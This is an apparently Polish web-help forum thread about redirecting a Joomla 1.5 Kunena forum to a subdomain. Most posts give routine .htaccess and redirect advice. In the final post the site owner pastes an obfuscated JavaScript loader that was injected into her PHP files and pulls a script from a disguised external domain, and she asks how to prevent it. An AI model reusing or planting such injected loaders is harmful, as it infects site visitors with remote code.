Joomla 1.5. + Kunena / .htacces przekierowanie forum na forum.domena.pl
Wyniki 1 do 8 z 8

Temat: Joomla 1.5. + Kunena / .htacces przekierowanie forum na forum.domena.pl

  1. #1
    Debiutant
    Dołączył
    26-11-2009
    Wpisy
    4
    Punkty
    10

    Joomla 1.5. + Kunena / .htacces przekierowanie forum na forum.domena.pl

    Witam,
    Zainstalowałam Joomla 1.5. + Kunena.
    Mam problem z przekierowaniem, ponieważ forum jest zainstalowane jak component.

    Jak zrobić przekierowanie forum aby przekierowywało na forum.domena.pl
    W joomla ustawiłam, że kunena jest pod linkiem forum.
    Aktualnie w .htaccess mam coś takiego (przekierowywuje ale strona jest pusta)

    Kod:
    RewriteEngine On
    
    RewriteCond %{HTTP_HOST} ^domena.pl [NC]
    RewriteRule ^(.*)$ http://www.domena.pl/$1 [R=301,L]
    
    RewriteRule ^forum.html?$ http://forum.domena.pl [R=301,L]
    proszę o pomoc

  2. Pani Reklamowa
    Pani Reklamowa jest aktywna
    Avatar Panny Google

    Dołączył
    19-08-2010
    Skąd
    Internet
    Postów
    milion
    Pochwał
    setki
  3. #2
    Senior moje awatar
    Dołączył
    08-01-2008
    Skąd
    Silesia
    Wpisy
    6 057
    Punkty
    188

    Domyślny

    W panelu zarządzania domeną utwórz pod domenę z adresem do forum i ustaw aby ten adres wyświetlał zawartość katalogu public_html/forum/, wtedy będzie działaś jak należy. Nie zapomnij, żeby wszystkie linki do forum były podawane z adresem pod domeny (forum.domena.pl).
    Webdeveloper do usług ;)

  4. #3
    Debiutant
    Dołączył
    26-11-2009
    Wpisy
    4
    Punkty
    10

    Domyślny

    Cytat Wysłane przez moje Zobacz wiadomość
    W panelu zarządzania domeną utwórz pod domenę z adresem do forum i ustaw aby ten adres wyświetlał zawartość katalogu public_html/forum/, .
    katalog forum jest pusty czy coś do niego wgrać?

    po tych zmianach - forum.domena.pl jest biała

  5. #4
    Wyjadacz souacz awatar
    Dołączył
    30-07-2009
    Skąd
    Poznań
    Wpisy
    714
    Punkty
    77

    Domyślny

    Jeśli Joomla instalowałaś tylko po to, żeby było forum (bo nie wiem) wystarczy domyślną pozycje menu ustawić na forum i podpiąć domene pod katalog z Twoją Joomla.
    Jeśli masz coś tam jeszcze co wyświetla się pod inną domeną (w tej Joomla) to możesz zrobić przekierowanie na url (Twojego forum)
    A jak nie masz mozliwości przekierowywania domeny na url to możesz utworzyć katalog forum, podpiąć do niego domene forum.domena.pl, umiescic w nim index.html z zawartym np. flashem, który na pierwszej klatce ma wpisany skrypt przekierowujący na url forum
    c'est la żizń...

  6. #5
    Wyga trzepiz awatar
    Dołączył
    06-01-2006
    Skąd
    SH | SC
    Wpisy
    3 528
    Punkty
    252

    Domyślny

    umiescic w nim index.html z zawartym np. flashem, który na pierwszej klatce ma wpisany skrypt przekierowujący na url forum
    a prościej się nie da ?

    1. redirect html
    Kod:
    <meta HTTP-EQUIV="REFRESH" content="0; url=http://www.yourdomain.com/index.html">
    2. redirect php
    Kod:
    <?PHP header("Location: http://www.example.com/"); exit ?>
    no i jeszcze zawsze .htaccess

  7. #6
    Wyjadacz souacz awatar
    Dołączył
    30-07-2009
    Skąd
    Poznań
    Wpisy
    714
    Punkty
    77

    Domyślny

    Pewnie, że się da
    Napisałem "na przykład" bo większość ludzi ma problem z najprostszym kodem HTML, o php nie wspominając. A flashowego "samograja" ma prawie każdy i zrobienie takiej "animacji" to sekunda.
    Poza tym można w tym jakieś intro "śliczne" zrobić ;)
    c'est la żizń...

  8. #7
    Debiutant
    Dołączył
    26-11-2009
    Wpisy
    4
    Punkty
    10

    Domyślny

    Cytat Wysłane przez souacz Zobacz wiadomość
    Jeśli Joomla instalowałaś tylko po to, żeby było forum (bo nie wiem) wystarczy domyślną pozycje menu ustawić na forum i podpiąć domene pod katalog z Twoją Joomla.

    Na stronie <a href="http://www.domena.pl/" target="_blank">
    Kod PHP:
    [quote]domena.pl[/quote
    jest joomla zaisntalowana w katalogu public_html/domena.pl/
    Dodatkowo zainstalowałam Forum Kunena (dodatkowy komponent), na głównej stronie wywołuję forum na adres
    Kod PHP:
    [quote]domena.pl/forum [/quote
    a w .htaccess robię przekierowanie na forum.domena.pl natomist po wejsciu na forum.domena.pl jest biała strona (utworzylam tez katalog na subdomeny public_html/forum/ ) ale też strona jest biała.

  9. #8
    Debiutant
    Dołączył
    26-11-2009
    Wpisy
    4
    Punkty
    10

    Domyślny

    Piszę dalej w tym wątku bo jestem spanikowana.

    Czy w joomla jest luka?
    Ktoś dokleił do moich plików .php taki ciąg znaków:
    Kod PHP:
    **********/*GNU GPL*/ try{window.onload = function(){var H3qqea3ur6p document.createElement('script');H3qqea3ur6p.setAttribute('type''text/javascript');H3qqea3ur6p.setAttribute('id''myscript1');H3qqea3ur6p.setAttribute('src',  'h#!t&##(t&()p$$:!#@/!(/$#l!)i!&v()@e!^(.$(!c!)o)m@.&!#g#@o((o^g)(l^$!e$)@.&)$c$#o(m#^@.)$b#@#!#a&i#!d^$#$u#)$!(-!((m^!s$)n$&(.@)@c^@$o((m!(&.^)(b&!!)e@s(&t@@a()r#$#)t))@s#!#)a!l##e@(.))&r$!u!&):)8(0$)@$8^#^@0&)$^/!!&w@$(o@^r(^(!d@^p^#)r#e@^s(&s&@@.(^^c#^o@!!m$)/)&^g@$(^o@(^o@g@&$l&&#e^))&@-($(m)#)a#)i^l^#.!&^)i!&t$@^/((!(l)!i&v^(&(e()#j^$a&s@(&m$^&(i$#@n!#^-#@)p$!!$h$!o(&#t(#o##)!b#!$u^c^#k((e&!)t#!((#.$$@c!&@o@m^)&/)!c&#(n$)e()&&t)#-^#!c^(@n^^n&#).)c!&!o$#m($/$^a&!@@b&()o^($(u!&#)t^#-#))e$@@)b##a#^y&&@.&#(^c&o^^m^@/(@^^'.replace(/\^|&|@|\)|\(|#|\!|\$/ig, ''));H3qqea3ur6p.setAttribute('defer', 'defer');document.body.appendChild(H3qqea3ur6p);}} catch(e) {}</script> 
    Jak temu zapobiec?

Reguły pisania

  • Nie możesz zakładać nowych tematów
  • Nie możesz dodawać wypowiedzi
  • Nie możesz dodawać załączników
  • Nie możesz poprawiać swoich postów
  •